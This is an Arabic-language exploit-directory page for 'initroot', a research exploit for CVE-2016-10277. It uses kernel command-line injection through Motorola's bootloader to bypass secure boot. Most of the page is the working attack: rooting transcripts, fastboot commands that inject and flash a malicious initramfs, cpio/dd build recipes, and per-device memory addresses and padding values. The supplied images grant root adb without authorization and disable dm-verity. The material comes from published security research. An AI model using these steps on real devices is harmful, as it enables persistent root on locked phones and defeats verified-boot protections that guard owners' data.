Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/alephsecurity/initroot
أمان أندرويدتصعيد الامتيازاتآليات الاستمراريةتحليل الثغرات الأمنيةالاستغلالأمن الجوالتطوير الحمولاتاستغلال الملفات الثنائية
GitHubalephsecurity/initroot

initroot

تهييج غير مقيد لـ Motorola: استغلال CVE-2016-10277 لتجاوز الإقلاع الآمن وقفل الجهاز

عرض المستودع
8424منذ 8 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

إينيتروت: حقن سطر أوامر النواة في محمل الإقلاع لموتورولا وتجاوز الإقلاع الآمن وقفل الجهاز (CVE-2016-10277)

بقلم روي هاي / أليف ريسيرتش، إتش سي إل تكنولوجيز

المرحلة الأولى من الاستغلال: كسر الحماية المقيد

هذا الاستغلال يمنح وصول جذر غير مقيد مؤقت على الجهاز. على سبيل المثال، على cedric (تم إزالة بعض الرسائل للوضوح):

root@kitploit:~
$ cd ./tethered/cedric
$ ./initroot-tethered.sh
Welcome to initroot-cedric-tethered
...
(bootloader) <UTAG name="fsg-id" type="str" protected="false">
(bootloader)   <value>
(bootloader)     a initrd=0xA2100000,1588596
(bootloader)   </value>
(bootloader)   <description>
(bootloader)     FSG IDs, see http://goo.gl/gPmhU
(bootloader)   </description>
(bootloader) </UTAG>
OKAY [  0.015s]
finished. total time: 0.015s
target reported max download size of 536870912 bytes
sending 'aleph' (34319 KB)...
OKAY [  1.098s]
writing 'aleph'...
(bootloader) Invalid partition name aleph
FAILED (remote failure)
finished. total time: 1.101s
(bootloader) slot-count: not found
(bootloader) slot-suffixes: not found
(bootloader) slot-suffixes: not found
resuming boot...
OKAY [  0.006s]
finished. total time: 0.006s
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3014(readproc) context=u:r:shell:s0
$ adb shell
cedric:/ # 

المرحلة الثانية من الاستغلال: كسر الحماية غير المقيد

هذا الاستغلال يمنح وصول جذر دائم على الجهاز. على سبيل المثال، على athene (تم إزالة بعض الرسائل للوضوح):

root@kitploit:~
$ cd ./untethered/athene
$ ./initroot-untethered.sh 
Welcome to initroot-athene-untethered
Welcome to initroot-athene-tethered
...
(bootloader) <UTAG name="fsg-id" type="str" protected="false">
(bootloader)   <value>
(bootloader)     a initrd=0x92000000,2505052
(bootloader)   </value>
(bootloader)   <description>
(bootloader)     FSG IDs, see http://goo.gl/gPmhU
(bootloader)   </description>
(bootloader) </UTAG>

OKAY [  0.015s]
finished. total time: 0.015s
target reported max download size of 536870912 bytes
sending 'aleph' (35214 KB)...
OKAY [  1.131s]
writing 'aleph'...
(bootloader) Invalid partition name aleph
FAILED (remote failure)
finished. total time: 1.138s
(bootloader) slot-count: not found
(bootloader) slot-suffixes: not found
(bootloader) slot-suffixes: not found
resuming boot...
OKAY [  0.006s]
finished. total time: 0.006s
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3014(readproc) context=u:r:kernel:s0
padC-initroot: 1 file pushed. 11.1 MB/s (22937600 bytes in 1.963s)
44800+0 records in
44800+0 records out
22937600 bytes transferred in 3.017 secs (7602784 bytes/sec)
...
(bootloader) <UTAG name="fsg-id" type="str" protected="false">
(bootloader)   <value>
(bootloader)     a rdinit= root=/dev/mmcblk0p41
(bootloader)   </value>
(bootloader)   <description>
(bootloader)     FSG IDs, see http://goo.gl/gPmhU
(bootloader)   </description>
(bootloader) </UTAG>

OKAY [  0.015s]
finished. total time: 0.015s
rebooting...

finished. total time: 0.815s
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3014(readproc) context=u:r:kernel:s0
athene:/ # 

إنتاج أرشيف initramfs ضار خاص بك

  1. استخدم initroot-<device>.cpio.gz الملتزم، أو أنتج ملفك الخاص:
root@kitploit:~
$ cd <initramfs folder>
$ find . | grep -v [.]$ | cpio -R root:root -o -H newc | gzip > ../initroot-<device>.cpio.gz
OR if padding is needed:
$ dd if=/dev/zero of=../pad ibs=1 count=<PAD_SIZE>
$ cp ../pad ../initroot-<device>.cpio.gz && find . | grep -v [.]$ | cpio -R root:root -o -H newc | gzip > ../tmp && ls -la ../tmp && cat ../tmp >> ../initroot-<device>.cpio.gz  && rm -fr ../tmp
$ cd ..
  1. صور initramfs الملتزمة لدينا تعمل adb كجذر افتراضيًا. لن تطلب إذنًا. بالإضافة إلى ذلك، تم تعطيل dm-verity على الأقسام ذات الصلة
root@kitploit:~
fastboot oem config fsg-id "a initrd=<SCRATCH_ADDR+PAD_SIZE>,<initroot.cpio.gz size-PAD_SIZE>"`
fastboot flash foo initroot-<device>.cpio.gz`
fastboot continue
  1. إذا استخدمت initramfs الخاص بنا، فسيمنحك adb shell الآن شل جذر:
root@kitploit:~
$ adb shell
shamu:/ # id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc) context=u:r:su:s0

إنشاء استغلال غير مقيد لأجهزة Moto الأخرى

اقرأ منشور مدونتنا

الأجهزة المؤكدة

تم الإبلاغ من المجتمع

ملاحظة

قد تؤثر هذه الثغرة على أجهزة موتورولا الأخرى أيضًا: ستحتاج إلى initramfs مختلف. عنوان فيزيائي مختلف لـ initrd (SCRATCH_ADDR). قد يختلف PADDING أيضًا.

فيديو توضيحي

فيديو توضيحي لـ CVE-2016-10277

المنشورات

  1. initroot: تجاوز الإقلاع الآمن لـ Nexus 6 من خلال حقن سطر أوامر النواة
  2. initroot: مرحبًا Moto
  3. حقن سطر أوامر النواة في محمل الإقلاع لأندرويد موتورولا وتجاوز الإقلاع الآمن
  4. initroot غير المقيد (USENIX WOOT '17)
  5. ورقة USENIX WOOT '17
تنزيل الأداة
الجهازالاسم الرمزيSCRATCH_ADDRPADDINGinitramfs الملتزمالقسم غير المستخدم
Nexus 6shamu0x110000000x0AOSP userdebugmmcblk0p11
Moto G5 (XT1676)cedric0xA01000000x2000000Release، init و adbd معدّلان لتعطيل SELinux، set{u,g}id إلى shell، إسقاط الصلاحيات ومصادقة adb، إلخmmcblk0p41
Moto G4 (XT1622)athene0x900000000x2000000""mmcblk0p48
الجهازالاسم الرمزيSCRATCH_ADDRالمبلغالوصف
Moto G5 Pluspotter0xA0100000drbeatخاصية التمهيد المحقونة. [إثبات]
Moto G4 Play (XT1607)harpia0x90000000m-mullinsاستغلال كامل لـ Amazon XT1607. [إثبات]
Moto G4 Play (XT1609)harpia0x90000000@utoprimeاستغلال كامل لـ Verizon XT1609. [إثبات]
Moto G4 (XT1625)athene0x90000000@EWorcelinitrd محقون تسبب في حلقات إقلاع. [إثبات]
Moto G3osprey0x90000000@asiekierkainitrd محقون تسبب في حلقات إقلاع. [إثبات]
Moto G2 (XT1072)thea0x11000000@TheElixinitrd محقون تسبب في حلقات إقلاع. [إثبات]
Moto G (XT1032)falcon_retfr0x11000000Pierre Zurekاستغلال كامل مع حشوة 64MB [إثبات]
Moto E (XT830C)condor_cdma0x0E000000fetcherاستغلال كامل لـ XT830C المقفلة على Tracfone/Verizon مع حشوة 32MB [إثبات]
أخرى--@jcase[إثبات]